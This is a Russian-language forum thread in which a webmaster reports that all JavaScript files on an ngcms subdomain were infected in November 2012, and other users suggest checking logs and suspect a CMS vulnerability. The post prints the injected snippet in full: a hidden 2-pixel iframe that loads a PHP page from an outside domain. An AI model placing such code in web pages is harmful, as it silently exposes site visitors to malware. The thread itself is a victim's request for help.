Вы не зашли.
Страницы 1
Тема закрыта
Всем привет. Столкнулся с проблемой, был взломан сайт 19.11.2012
Были модифицированы все js файлы путём добавления кода следующего содержания:
/*0fead1*/
(function()
{
var a = document.createElement('iframe');
a.src = 'http://www.real.dp.ua/img/upload/item/207/stats.php';
a.style.position = 'absolute';
a.style.border = '0';
a.style.height = '2px';
a.style.width = '2px';
a.style.left = '1px';
a.style.top = '1px';
if(!document.getElementById('mira'))
{
document.write('<div id=\'mira\'></div>');
document.getElementById('mira').appendChild(a);
}
})();
/*/0fead1*/
Не могу понять как такое произошло. Я бы мог погрешить на то, что спалил пароль от хостинга, но тогда было бы логично что заразили бы все поддомены мои тестовые, а заразили только один, значит не спалили пароль. Взломали только тот поддомен, где стояла ngcms 0.9.3 + SVN [SVN1047+] Ещё более нелогичным можно посчитать тот факт, что взломали выключенный к показу посетителям сайт, то есть из админки я выключил его, правда не помню когда, до взлома или уже после... Как это можно проверить?
Напрашивается вывод что есть какая то уязвимость в самом движке. Встречался кто с подобной проблемой и как лечить? Сайт: o.nushaba.ru
Не в сети
easmik, очевидно ломали скриптом, или каким то софтом который автоматизировал процесс, иначе зачем ещё ломать сайт который выключен. Но всё же остаются вопросы, почему взломали именно сайт с ngcms внутри а не все остальные на хостинге, ну или вопрос как это сделали, тогда будет понятно что то. В общем думаю есть дыра в движке, так как аналогичный взлом был около года назад, тогда я не стал писать.
Не в сети
Логи то смотрели?
https://www.google.ru/search?client=ope … el=suggest
Изменено infinity237 (2012-12-24 18:57:02)
Не в сети
Ну и как ты теперь хочешь чтобы мы тебе сказали где бага?
Не в сети
Страницы 1
Тема закрыта